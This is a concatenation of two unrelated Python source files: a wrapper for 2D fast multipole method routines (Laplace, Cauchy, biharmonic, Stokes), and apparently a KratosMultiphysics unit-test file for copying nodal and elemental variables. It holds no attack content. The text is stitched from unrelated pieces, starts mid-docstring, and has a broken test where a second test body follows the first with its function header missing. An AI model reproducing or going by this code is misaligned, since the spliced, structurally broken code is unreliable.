If the array was provided but incorrect, then the code
will return False
3) Entries of the dictionary will only exist if they were asked for
i.e. if no 'source' quantities were requested, the 'source'
dictionary will not exist
"""
source, _, ns = check_array(source, (2,None), float, 'source', True)
charge, ifcharge = check_array(charge, (ns,), complex, 'charge')
dipstr, ifdipstr = check_array(dipstr, (ns,), complex, 'dipstr')
dipvec, ifdipvec = check_array(dipvec, (2,ns), float, 'dipvec')
if ifdipstr and not ifdipvec:
raise Exception('If dipstr is provided, dipvec must be also')
pot, ifpot = check_output(array_source_potential,
compute_source_potential, (1,ns), complex)
grad, ifgrad = check_output(array_source_gradient,
compute_source_gradient, (2,ns), complex)
hess, ifhess = check_output(array_source_hessian,
compute_source_hessian, (3,ns), complex)
target, iftarget, nt = check_array(target, (2,None), float, 'target', True)
if not iftarget:
if compute_target_potential or compute_target_gradient \
or compute_target_hessian:
raise Exception('If asking for a target quanitity, \
target must be given')
pottarg, ifpottarg = check_output(array_target_potential,
compute_target_potential, (1,nt), complex)
gradtarg, ifgradtarg = check_output(array_target_gradient,
compute_target_gradient, (2,nt), complex)
hesstarg, ifhesstarg = check_output(array_target_hessian,
compute_target_hessian, (3,nt), complex)
ier = int(0)
iprec = initialize_precision(precision)
if direct:
l2dpartdirect(ns, source, ifcharge, charge, ifdipstr, dipstr, dipvec,
ifpot, pot, ifgrad, grad, ifhess, hess, nt, target, ifpottarg,
pottarg, ifgradtarg, gradtarg, ifhesstarg, hesstarg)
else:
lfmm2dparttarg(ier, iprec, ns, source, ifcharge, charge, ifdipstr,
dipstr, dipvec, ifpot, pot, ifgrad, grad, ifhess, hess, nt, target,
ifpottarg, pottarg, ifgradtarg, gradtarg, ifhesstarg, hesstarg)
out = get_fmmlib2d_output(
compute_source_potential,
compute_source_gradient,
compute_source_hessian,
pot, grad, hess,
compute_target_potential,
compute_target_gradient,
compute_target_hessian,
pottarg, gradtarg, hesstarg,
ier
)
return out
def RFMM(
source,
target = None,
charge = None,
dipstr = None,
dipvec = None,
direct = False,
compute_source_potential = False,
compute_source_gradient = False,
compute_source_hessian = False,
compute_target_potential = False,
compute_target_gradient = False,
compute_target_hessian = False,
array_source_potential = None,
array_source_gradient = None,
array_source_hessian = None,
array_target_potential = None,
array_target_gradient = None,
array_target_hessian = None,
precision = 4,
):
"""
Pythonic interface for Laplace Particle FMM (real densities)
Wraps the two functions:
rfmm2dparttarg - (if direct=False)
r2dpartdirect - (if direct=True)
Parameters:
source (required), float(2, ns): location of sources
target (optional), float(2, nt): location of targets
charge (optional), float(ns): charges at source locations
dipstr (optional), float(ns): dipole at source locations
dipvec (optional), float(2, ns): orientation vector of dipoles
if dipstr is set, then dipvec must be, also
direct (optional), bool: do direct sum or FMM
compute_#_* (optional), bool: whether to compute * at # locations
array_#_* (optional), float(k,n): preallocated arrays for result
k = 1 for *=potential, 2 for *=gradient, 3 for *=hessian
n = ns for #=source, nt for #=target
if these arrays are not provided, are not of the correct size, not
of the correct type, or not fortran contiguous, new arrays for
the results will be allocated at runtime
precision (optional), float: precision, see documentation for FMM
Returns:
Dictionary:
'ier': (integer) output code
0: successful completion of code
4: failure to allocate memory for tree
8: failure to allocate memory for FMM workspaces
16: failure to allocate memory for multipole/local
expansions
'source': (quantities computed at source locations)
'Pu' : complex(1,ns), potential
'u' : complex(ns), potential
'u_x' : float(ns), x-derivative of potential
'u_y' : float(ns), y-derivative of potential
'Du' : float(2,ns), gradient of potential
'u_xx' : float(ns), xx-derivative of potential
'u_xy' : float(ns), xy-derivative of potential
'u_yx' : float(ns), yx-derivative of potential
'u_yy' : float(ns), xy-derivative of potential
'Hu' : float(3,ns), hessian of potential
'target': (quantities computed at target locations):
same as above, but for target related things
ns replaced by nt, in the shapes
Some notes about the output:
1) 'u', 'u_x', 'u_y', 'u_xx', 'u_xy', 'u_yx', and 'u_yy' are
not duplications; they are simply views
into the arrays 'Pu', Du' and 'Hu', organized as follows:
Pu[0] = u
Du[0] = u_x
Du[1] = u_y
Hu[0] = u_xx
Hu[1] = u_xy
Hu[1] = u_yx
Hu[2] = u_yy
2) If array_#_* is provided and was acceptable, the code:
"array_#_* is output['#']['**']"
will return True (note ** is Pu for *=potential,
Du for *=gradient, Hu for *=Hessian)
If the array was provided but incorrect, then the code
will return False
3) Entries of the dictionary will only exist if they were asked for
i.e. if no 'source' quantities were requested, the 'source'
dictionary will not exist
"""
source, _, ns = check_array(source, (2,None), float, 'source', True)
charge, ifcharge = check_array(charge, (ns,), float, 'charge')
dipstr, ifdipstr = check_array(dipstr, (ns,), float, 'dipstr')
dipvec, ifdipvec = check_array(dipvec, (2,ns), float, 'dipvec')
if ifdipstr and not ifdipvec:
raise Exception('If dipstr is provided, dipvec must be also')
pot, ifpot = check_output(array_source_potential,
compute_source_potential, (1,ns), float)
grad, ifgrad = check_output(array_source_gradient,
compute_source_gradient, (2,ns), float)
hess, ifhess = check_output(array_source_hessian,
compute_source_hessian, (3,ns), float)
target, iftarget, nt = check_array(target, (2,None), float, 'target', True)
if not iftarget:
if compute_target_potential or compute_target_gradient \
or compute_target_hessian:
raise Exception('If asking for a target quanitity, \
target must be given')
pottarg, ifpottarg = check_output(array_target_potential,
compute_target_potential, (1,nt), float)
gradtarg, ifgradtarg = check_output(array_target_gradient,
compute_target_gradient, (2,nt), float)
hesstarg, ifhesstarg = check_output(array_target_hessian,
compute_target_hessian, (3,nt), float)
ier = int(0)
iprec = initialize_precision(precision)
if direct:
r2dpartdirect(ns, source, ifcharge, charge, ifdipstr, dipstr, dipvec,
ifpot, pot, ifgrad, grad, ifhess, hess, nt, target, ifpottarg,
pottarg, ifgradtarg, gradtarg, ifhesstarg, hesstarg)
else:
rfmm2dparttarg(ier, iprec, ns, source, ifcharge, charge, ifdipstr,
dipstr, dipvec, ifpot, pot, ifgrad, grad, ifhess, hess, nt, target,
ifpottarg, pottarg, ifgradtarg, gradtarg, ifhesstarg, hesstarg)
out = get_fmmlib2d_output(
compute_source_potential,
compute_source_gradient,
compute_source_hessian,
pot, grad, hess,
compute_target_potential,
compute_target_gradient,
compute_target_hessian,
pottarg, gradtarg, hesstarg,
ier
)
return out
def ZFMM(
source,
target = None,
dipstr = None,
direct = False,
compute_source_potential = False,
compute_source_gradient = False,
compute_source_hessian = False,
compute_target_potential = False,
compute_target_gradient = False,
compute_target_hessian = False,
array_source_potential = None,
array_source_gradient = None,
array_source_hessian = None,
array_target_potential = None,
array_target_gradient = None,
array_target_hessian = None,
precision = 4,
):
"""
Pythonic interface for Cauchy Particle FMM
Wraps the two functions:
zfmm2dparttarg - (if direct=False)
z2dpartdirect - (if direct=True)
Parameters:
source (required), float(2, ns): location of sources
target (optional), float(2, nt): location of targets
dipstr (required), complex(ns): dipole at source locations
direct (optional), bool: do direct sum or FMM
compute_#_* (optional), bool: whether to compute * at # locations
array_#_* (optional), complex(nt): preallocated arrays for result
n = ns for #=source, nt for #=target
if these arrays are not provided, are not of the correct size, not
of the correct type, or not fortran contiguous, new arrays for
the results will be allocated at runtime
precision (optional), float: precision, see documentation for FMM
Returns:
Dictionary:
'ier': (integer) output code
0: successful completion of code
4: failure to allocate memory for tree
8: failure to allocate memory for FMM workspaces
16: failure to allocate memory for multipole/local
expansions
'source': (quantities computed at source locations)
'u' : complex(ns), potential
'Du' : complex(ns), gradient of potential
'Hu' : complex(ns), hessian of potential
'target': (quantities computed at target locations):
same as above, but for target related things
ns replaced by nt, in the shapes
Some notes about the output:
1) If array_#_* is provided and was acceptable, the code:
"array_#_* is output['#']['**']"
will return True (note ** is u for *=potential,
Du for *=gradient, Hu for *=Hessian)
If the array was provided but incorrect, then the code
will return False
2) Entries of the dictionary will only exist if they were asked for
i.e. if no 'source' quantities were requested, the 'source'
dictionary will not exist
"""
source, _, ns = check_array(source, (2,None), float, 'source', True)
dipstr, ifdipstr = check_array(dipstr, (ns,), complex, 'dipstr')
if not ifdipstr:
raise Exception("For fmm kind 'cauchy', dipstr must be provided")
pot, ifpot = check_output(array_source_potential,
compute_source_potential, (ns,), complex)
grad, ifgrad = check_output(array_source_gradient,
compute_source_gradient, (ns,), complex)
hess, ifhess = check_output(array_source_hessian,
compute_source_hessian, (ns,), complex)
target, iftarget, nt = check_array(target, (2,None), float, 'target', True)
if not iftarget:
if compute_target_potential or compute_target_gradient \
or compute_target_hessian:
raise Exception('If asking for a target quanitity, \
target must be given')
pottarg, ifpottarg = check_output(array_target_potential,
compute_target_potential, (nt,), complex)
gradtarg, ifgradtarg = check_output(array_target_gradient,
compute_target_gradient, (nt,), complex)
hesstarg, ifhesstarg = check_output(array_target_hessian,
compute_target_hessian, (nt,), complex)
ier = int(0)
iprec = initialize_precision(precision)
if direct:
z2dpartdirect(ns, source, dipstr, ifpot, pot, ifgrad, grad, ifhess,
hess, nt, target, ifpottarg, pottarg, ifgradtarg, gradtarg,
ifhesstarg, hesstarg)
else:
zfmm2dparttarg(ier, iprec, ns, source, dipstr, ifpot, pot, ifgrad, grad,
ifhess, hess, nt, target, ifpottarg, pottarg, ifgradtarg, gradtarg,
ifhesstarg, hesstarg)
out = get_fmmlib2d_output_cauchy(
compute_source_potential,
compute_source_gradient,
compute_source_hessian,
pot, grad, hess,
compute_target_potential,
compute_target_gradient,
compute_target_hessian,
pottarg, gradtarg, hesstarg,
ier
)
return out
def CFMM(
source,
target = None,
charge = None,
dipstr = None,
direct = False,
compute_source_potential = False,
compute_source_gradient = False,
compute_source_hessian = False,
compute_target_potential = False,
compute_target_gradient = False,
compute_target_hessian = False,
array_source_potential = None,
array_source_gradient = None,
array_source_hessian = None,
array_target_potential = None,
array_target_gradient = None,
array_target_hessian = None,
precision = 4,
):
"""
Pythonic interface for Cauchy Particle FMM (general)
Wraps the two functions:
cfmm2dparttarg - (if direct=False)
c2dpartdirect - (if direct=True)
Parameters:
source (required), float(2, ns): location of sources
target (optional), float(2, nt): location of targets
charge (optional), complex(ns): charges at source locations
dipstr (optional), complex(ns): dipole at source locations
direct (optional), bool: do direct sum or FMM
compute_#_* (optional), bool: whether to compute * at # locations
array_#_* (optional), complex(k,n): preallocated arrays for result
k = 1 for *=potential, 2 for *=gradient, 3 for *=hessian
n = ns for #=source, nt for #=target
if these arrays are not provided, are not of the correct size, not
of the correct type, or not fortran contiguous, new arrays for
the results will be allocated at runtime
precision (optional), float: precision, see documentation for FMM
Returns:
Dictionary:
'ier': (integer) output code
0: successful completion of code
4: failure to allocate memory for tree
8: failure to allocate memory for FMM workspaces
16: failure to allocate memory for multipole/local
expansions
'source': (quantities computed at source locations)
'u' : complex(ns), potential
'Du' : complex(ns), gradient of potential
'Hu' : complex(ns), hessian of potential
'target': (quantities computed at target locations):
same as above, but for target related things
ns replaced by nt, in the shapes
Some notes about the output:
1) If array_#_* is provided and was acceptable, the code:
"array_#_* is output['#']['**']"
will return True (note ** is u for *=potential,
Du for *=gradient, Hu for *=Hessian)
If the array was provided but incorrect, then the code
will return False
2) Entries of the dictionary will only exist if they were asked for
i.e. if no 'source' quantities were requested, the 'source'
dictionary will not exist
"""
source, _, ns = check_array(source, (2,None), float, 'source', True)
charge, ifcharge = check_array(charge, (ns,), complex, 'charge')
dipstr, ifdipstr = check_array(dipstr, (ns,), complex, 'dipstr')
pot, ifpot = check_output(array_source_potential,
compute_source_potential, (ns,), complex)
grad, ifgrad = check_output(array_source_gradient,
compute_source_gradient, (ns,), complex)
hess, ifhess = check_output(array_source_hessian,
compute_source_hessian, (ns,), complex)
target, iftarget, nt = check_array(target, (2,None), float, 'target', True)
if not iftarget:
if compute_target_potential or compute_target_gradient \
or compute_target_hessian:
raise Exception('If asking for a target quanitity, \
target must be given')
pottarg, ifpottarg = check_output(array_target_potential,
compute_target_potential, (nt,), complex)
gradtarg, ifgradtarg = check_output(array_target_gradient,
compute_target_gradient, (nt,), complex)
hesstarg, ifhesstarg = check_output(array_target_hessian,
compute_target_hessian, (nt,), complex)
ier = int(0)
iprec = initialize_precision(precision)
if direct:
c2dpartdirect(ns, source, ifcharge, charge, ifdipstr, dipstr, ifpot,
pot, ifgrad, grad, ifhess, hess, nt, target, ifpottarg, pottarg,
ifgradtarg, gradtarg, ifhesstarg, hesstarg)
else:
cfmm2dparttarg(ier, iprec, ns, source, ifcharge, charge, ifdipstr,
dipstr, ifpot, pot, ifgrad, grad, ifhess, hess, nt, target,
ifpottarg, pottarg, ifgradtarg, gradtarg, ifhesstarg, hesstarg)
out = get_fmmlib2d_output_cauchy(
compute_source_potential,
compute_source_gradient,
compute_source_hessian,
pot, grad, hess,
compute_target_potential,
compute_target_gradient,
compute_target_hessian,
pottarg, gradtarg, hesstarg,
ier
)
return out
def BFMM(
source,
target = None,
charge = None,
dipole1 = None,
dipole2 = None,
compute_source_velocity = False,
compute_source_analytic_gradient = False,
compute_source_anti_analytic_gradient = False,
compute_target_velocity = False,
compute_target_analytic_gradient = False,
compute_target_anti_analytic_gradient = False,
array_source_velocity = None,
array_source_analytic_gradient = None,
array_source_anti_analytic_gradient = None,
array_target_velocity = None,
array_target_analytic_gradient = None,
array_target_anti_analytic_gradient = None,
precision = 4,
):
"""
Pythonic interface for Biharmonic FMM
Wraps the function:
bfmm2dparttarg
Parameters:
source (required), float(2, ns): location of sources
target (optional), float(2, nt): location of targets
charge (optional), complex(ns): charges at source locations
dipole1 (optional), complex(ns): dipole1 at source locations
dipole2 (optional), complex(ns): dipole2 at source locations
compute_#_* (optional), bool: whether to compute * at # locations
array_#_* (optional), complex(n): preallocated arrays for result
n = ns for #=source, nt for #=target
if these arrays are not provided, are not of the correct size, not
of the correct type, or not fortran contiguous, new arrays for
the results will be allocated at runtime
precision (optional), float: precision, see documentation for FMM
Returns:
Dictionary:
'ier': (integer) output code
0: successful completion of code
4: failure to allocate memory for tree
8: failure to allocate memory for FMM workspaces
16: failure to allocate memory for multipole/local
expansions
'source': (quantities computed at source locations)
'u' : complex(ns), potential
'u_analytic_gradient' : complex(ns), analytic gradient
'u_anti_analytic_gradient' : complex(ns), anti-analytic gradient
'target': (quantities computed at target locations):
same as above, but for target related things
ns replaced by nt, in the shapes
Some notes about the output:
2) If array_#_* is provided and was acceptable, the code:
"array_#_* is output['#']['*']"
will return True
If the array was provided but incorrect, then the code
will return False
3) Entries of the dictionary will only exist if they were asked for
i.e. if no 'source' quantities were requested, the 'source'
dictionary will not exist
"""
source, _, ns = check_array(source, (2,None), float, 'source', True)
charge, ifcharge = check_array(charge, (ns,), complex, 'charge')
dipole1, ifdipole1 = check_array(dipole1, (ns,), complex, 'dipole1')
dipole2, ifdipole2 = check_array(dipole2, (ns,), complex, 'dipole2')
if (ifdipole1 or ifdipole2) and not (ifdipole1 and ifdipole2):
raise Exception('If one of the dipoles is set, than the other must \
also be set.')
ifdipole = ifdipole1
vel, ifvel = check_output(array_source_velocity,
compute_source_velocity, (ns,), complex)
grada, ifgrada = check_output(array_source_analytic_gradient,
compute_source_analytic_gradient, (ns,), complex)
gradaa, ifgradaa = check_output(array_source_anti_analytic_gradient,
compute_source_anti_analytic_gradient, (ns,), complex)
target, iftarget, nt = check_array(target, (2,None), float, 'target', True)
if not iftarget:
if compute_target_velocity or compute_target_analytic_gradient \
or compute_target_anti_analytic_gradient:
raise Exception('If asking for a target quanitity, \
target must be given')
veltarg, ifveltarg = check_output(array_target_velocity,
compute_target_velocity, (nt,), complex)
gradatarg, ifgradatarg = check_output(array_target_analytic_gradient,
compute_target_analytic_gradient, (nt,), complex)
gradaatarg, ifgradaatarg = check_output(array_target_anti_analytic_gradient,
compute_target_anti_analytic_gradient, (nt,), complex)
ier = int(0)
iprec = initialize_precision(precision)
bhfmm2dparttarg(ier, iprec, ns, source, ifcharge, charge, ifdipole, dipole1,
dipole2, ifvel, vel, ifgrada, grada, ifgradaa, gradaa, nt, target,
ifveltarg, veltarg, ifgradatarg, gradatarg, ifgradaatarg, gradaatarg)
output = {}
any_source = compute_source_velocity or compute_source_analytic_gradient \
or compute_source_anti_analytic_gradient
if any_source:
source_output = {}
if compute_source_velocity:
source_output['u'] = vel
if compute_source_analytic_gradient:
source_output['u_analytic_gradient'] = grada
if compute_source_anti_analytic_gradient:
source_output['u_anti_analytic_gradient'] = gradaa
output['source'] = source_output
any_target = compute_target_velocity or compute_target_analytic_gradient \
or compute_target_anti_analytic_gradient
if any_target:
target_output = {}
if compute_target_velocity:
target_output['u'] = veltarg
if compute_target_analytic_gradient:
target_output['u_analytic_gradient'] = gradatarg
if compute_target_anti_analytic_gradient:
target_output['u_anti_analytic_gradient'] = gradaatarg
output['target'] = target_output
output['ier'] = ier
return output
def SFMM(
source,
target = None,
forces = None,
dipstr = None,
dipvec = None,
compute_source_velocity = False,
compute_source_stress = False,
compute_target_velocity = False,
compute_target_stress = False,
precision = 4,
):
"""
Pythonic interface for Stokes FMM
Wraps the function:
bfmm2dparttarg
Parameters:
source (required), float(2, ns): location of sources
target (optional), float(2, nt): location of targets
forces (optional), float(2, ns): forces at source locations
dipstr (optional), float(2, ns): dipole strengths at source locations
dipvec (optional), float(2, ns): orientation vector of dipoles
if dipstr is set, then dipvec must be, also
compute_#_* (optional), bool: whether to compute * at # locations
array_#_* (optional), float(k,n): preallocated arrays for result
k = 2 for *=velocity, k=5 for *=stress
n = ns for #=source, nt for #=target
if these arrays are not provided, are not of the correct size, not
of the correct type, or not fortran contiguous, new arrays for
the results will be allocated at runtime
precision (optional), float: precision, see documentation for FMM
Returns:
Dictionary:
'ier': (integer) output code
0: successful completion of code
4: failure to allocate memory for tree
8: failure to allocate memory for FMM workspaces
16: failure to allocate memory for multipole/local
expansions
'source': (quantities computed at source locations)
'u' : float(ns), velocity, x-direction
'v' : float(ns), velocity, y-direction
'u_x' : float(ns), x derivaitive of u
'u_y' : float(ns), y derivaitive of u
'v_x' : float(ns), x derivaitive of v
'v_y' : float(ns), y derivaitive of v
'p' : float(ns), pressure
'target': (quantities computed at target locations):
same as above, but for target related things
ns replaced by nt, in the shapes
Some notes about the output:
1) Entries of the dictionary will only exist if they were asked for
i.e. if no 'source' quantities were requested, the 'source'
dictionary will not exist
"""
source, _, ns = check_array(source, (2,None), float, 'source', True)
forces, ifforces = check_array(forces, (2, ns), float, 'forces')
dipstr, ifdipstr = check_array(dipstr, (2, ns), float, 'dipstr')
dipvec, ifdipvec = check_array(dipvec, (2, ns), float, 'dipvec')
if ifdipstr and not ifdipvec:
raise Exception('If dipstr is provided, dipvec must be also')
# construct inputs for the biharmonic FMM
sca = 1.0/(4.0*np.pi)
if ifforces:
tc = forces[0] + 1j*forces[1]
cc = -0.5j*tc*sca
else:
cc = None
if ifdipstr:
dsc = 1j*(dipstr[0] + 1j*dipstr[1])
dvc = dipvec[0] + 1j*dipvec[1]
d1 = dsc*dvc*sca
d2 = (dsc*np.conj(dvc) - np.conj(dsc)*dvc)*sca
else:
d1 = None
d2 = None
target, iftarget, nt = check_array(target, (2,None), float, 'target', True)
if not iftarget:
if compute_target_velocity or compute_target_stress:
raise Exception('If asking for a target quanitity, \
target must be given')
bout = BFMM(source,
target,
cc,
d1,
d2,
compute_source_velocity,
compute_source_stress,
compute_source_stress,
compute_target_velocity,
compute_target_stress,
compute_target_stress)
output = {}
any_source = compute_source_velocity or compute_source_stress
if any_source:
source_output = {}
if compute_source_velocity:
vel = -1.0j*bout['source']['u']
if ifforces:
correction = np.sum(cc) - cc
vel += 1j*correction
source_output['u'] = vel.real
source_output['v'] = vel.imag
if compute_source_stress:
agrad = bout['source']['u_analytic_gradient']
aagrad = bout['source']['u_anti_analytic_gradient']
w = -4*agrad.real
w2 = -2*aagrad.real
ux = aagrad.imag
vy = -ux
vx = 0.5*(w+w2)
uy = vx - w
p = -4*agrad.imag
source_output['u_x'] = ux
source_output['u_y'] = uy
source_output['v_x'] = vx
source_output['v_y'] = vy
source_output['p'] = p
output['source'] = source_output
any_target = compute_target_velocity or compute_target_stress
if any_target:
target_output = {}
if compute_target_velocity:
vel = -1.0j*bout['target']['u']
if ifforces:
vel += 1j*np.sum(cc)
target_output['u'] = vel.real
target_output['v'] = vel.imag
if compute_target_stress:
agrad = bout['target']['u_analytic_gradient']
aagrad = bout['target']['u_anti_analytic_gradient']
w = -4*agrad.real
w2 = -2*aagrad.real
ux = aagrad.imag
vy = -ux
vx = 0.5*(w+w2)
uy = vx - w
p = -4*agrad.imag
target_output['u_x'] = ux
target_output['u_y'] = uy
target_output['v_x'] = vx
target_output['v_y'] = vy
target_output['p'] = p
output['target'] = target_output
return output
function_map = {
'helmholtz' : HFMM,
'laplace-complex' : LFMM,
'laplace-real' : RFMM,
'laplace' : RFMM,
'cauchy' : ZFMM,
'cauchy-general' : CFMM,
'biharmonic' : BFMM,
'stokes' : SFMM,
}
|
from __future__ import print_function, absolute_import, division
# Importing the Kratos Library
import KratosMultiphysics
import KratosMultiphysics.KratosUnittest as KratosUnittest
import math
import os
def GetFilePath(fileName):
return os.path.join(os.path.dirname(os.path.realpath(__file__)), fileName)
class TestVariableUtils(KratosUnittest.TestCase):
def test_copy_model_part_nodal_var(self):
current_model = KratosMultiphysics.Model()
##set the origin model part
origin_model_part = current_model.CreateModelPart("OriginModelPart")
origin_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
origin_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
origin_model_part.SetBufferSize(2)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(origin_model_part)
##set the destination model part
destination_model_part = current_model.CreateModelPart("DestinationModelPart")
destination_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
destination_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
destination_model_part.SetBufferSize(2)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(destination_model_part)
##set the values in the origin model part
for node in origin_model_part.Nodes:
node.SetSolutionStepValue(KratosMultiphysics.VISCOSITY, 0, node.X + node.Y)
node.SetSolutionStepValue(KratosMultiphysics.VISCOSITY, 1, 2.0 * node.X + 3.0 * node.Y)
node.SetSolutionStepValue(KratosMultiphysics.DISPLACEMENT, 0, [node.X ** 2, 0.0, 0.0])
node.SetSolutionStepValue(KratosMultiphysics.DISPLACEMENT, 1, [node.X, node.Y, node.Z])
##copy the values to the destination model part
KratosMultiphysics.VariableUtils().CopyModelPartNodalVar(KratosMultiphysics.VISCOSITY, origin_model_part, destination_model_part, 0)
KratosMultiphysics.VariableUtils().CopyModelPartNodalVar(KratosMultiphysics.VISCOSITY, origin_model_part, destination_model_part, 1)
KratosMultiphysics.VariableUtils().CopyModelPartNodalVar(KratosMultiphysics.DISPLACEMENT, origin_model_part, destination_model_part, 0)
KratosMultiphysics.VariableUtils().CopyModelPartNodalVar(KratosMultiphysics.DISPLACEMENT, origin_model_part, destination_model_part, 1)
##check the copied values
for node in destination_model_part.Nodes:
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.VISCOSITY, 0), node.X + node.Y)
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.VISCOSITY, 1), 2.0 * node.X + 3.0 * node.Y)
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_X, 0), node.X ** 2)
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_X, 1), node.X)
def test_copy_model_part_nodal_var_to_non_historical_var(self):
##set the origin model part
current_model = KratosMultiphysics.Model()
origin_model_part = current_model.CreateModelPart("OriginModelPart")
origin_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
origin_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
origin_model_part.SetBufferSize(2)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(origin_model_part)
##set the destination model part
destination_model_part = current_model.CreateModelPart("DestinationModelPart")
destination_model_part.SetBufferSize(2)
destination_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
destination_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(destination_model_part)
##set the values in the origin model part
for node in origin_model_part.Nodes:
node.SetSolutionStepValue(KratosMultiphysics.VISCOSITY, 0, node.X + node.Y)
node.SetSolutionStepValue(KratosMultiphysics.DISPLACEMENT, 1, [node.X, node.Y, node.Z])
## initialize the containers in destination model part (otherwise the operation is not threadsafe!)
for node in destination_model_part.Nodes:
node.SetValue(KratosMultiphysics.VISCOSITY, 0)
node.SetValue(KratosMultiphysics.DISPLACEMENT, KratosMultiphysics.Array3())
node.SetValue(KratosMultiphysics.VELOCITY, KratosMultiphysics.Array3())
##copy the values to the destination model part
KratosMultiphysics.VariableUtils().CopyModelPartNodalVarToNonHistoricalVar(KratosMultiphysics.VISCOSITY, origin_model_part, destination_model_part, 0)
KratosMultiphysics.VariableUtils().CopyModelPartNodalVarToNonHistoricalVar(KratosMultiphysics.DISPLACEMENT, origin_model_part, destination_model_part, 1)
KratosMultiphysics.VariableUtils().CopyModelPartNodalVarToNonHistoricalVar(KratosMultiphysics.DISPLACEMENT, KratosMultiphysics.VELOCITY, origin_model_part, destination_model_part, 1)
##check the copied values
for node in destination_model_part.Nodes:
self.assertEqual(node.GetValue(KratosMultiphysics.VISCOSITY), node.X + node.Y)
self.assertEqual(node.GetValue(KratosMultiphysics.VELOCITY_X), node.X)
self.assertEqual(node.GetValue(KratosMultiphysics.DISPLACEMENT_X), node.X)
def test_copy_model_part_elemental_var(self):
current_model = KratosMultiphysics.Model()
##set the origin model part
origin_model_part = current_model.CreateModelPart("OriginModelPart")
origin_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
origin_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(origin_model_part)
##set the destination model part
destination_model_part = current_model.CreateModelPart("DestinationModelPart")
destination_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
destination_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(destination_model_part)
##set the values in the destination model part
for element in origin_model_part.Elements:
element.SetValue(KratosMultiphysics.DENSITY, element.Id*100)
element.SetValue(KratosMultiphysics.VOLUME_ACCELERATION, [element.Id*100, 0.0, 0.0])
##copy the values to the destination model part
KratosMultiphysics.VariableUtils().CopyModelPartElementalVar(KratosMultiphysics.DENSITY, origin_model_part, destination_model_part)
KratosMultiphysics.VariableUtils().CopyModelPartElementalVar(KratosMultiphysics.VOLUME_ACCELERATION, origin_model_part, destination_model_part)
##check the copied values
for element in destination_model_part.Elements:
self.assertEqual(element.GetValue(KratosMultiphysics.DENSITY), element.Id*100)
self.assertEqual(element.GetValue(KratosMultiphysics.VOLUME_ACCELERATION)[0], element.Id*100)
current_model = KratosMultiphysics.Model()
##set the model part
model_part = current_model.CreateModelPart("Main")
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.PARTITION_INDEX)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.ORIENTATION)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
##set the variable values
viscosity = 0.1
partition_index = 1
velocity = KratosMultiphysics.Vector(3)
velocity[0] = 2.0
velocity[1] = 4.0
velocity[2] = 8.0
displacement = KratosMultiphysics.Vector(3)
displacement[0] = 1.0
displacement[1] = 2.0
displacement[2] = 3.0
orientation = KratosMultiphysics.Quaternion()
orientation.X = 1.0
orientation.Y = 2.0
orientation.Z = 3.0
orientation.W = 4.0
KratosMultiphysics.VariableUtils().SetScalarVar(KratosMultiphysics.VISCOSITY, viscosity, model_part.Nodes)
KratosMultiphysics.VariableUtils().SetVariable(KratosMultiphysics.VELOCITY_X, velocity[0], model_part.Nodes)
KratosMultiphysics.VariableUtils().SetVariable(KratosMultiphysics.VELOCITY_Y, velocity[1], model_part.Nodes)
KratosMultiphysics.VariableUtils().SetVariable(KratosMultiphysics.VELOCITY_Z, velocity[2], model_part.Nodes)
KratosMultiphysics.VariableUtils().SetVariable(KratosMultiphysics.DISPLACEMENT, displacement, model_part.Nodes)
KratosMultiphysics.VariableUtils().SetVariable(KratosMultiphysics.PARTITION_INDEX, partition_index, model_part.Nodes)
KratosMultiphysics.VariableUtils().SetVariable(KratosMultiphysics.ORIENTATION, orientation, model_part.Nodes)
##verify the result
for node in model_part.Nodes:
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_X), 1.0)
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_Y), 2.0)
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_Z), 3.0)
self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.VISCOSITY), viscosity)
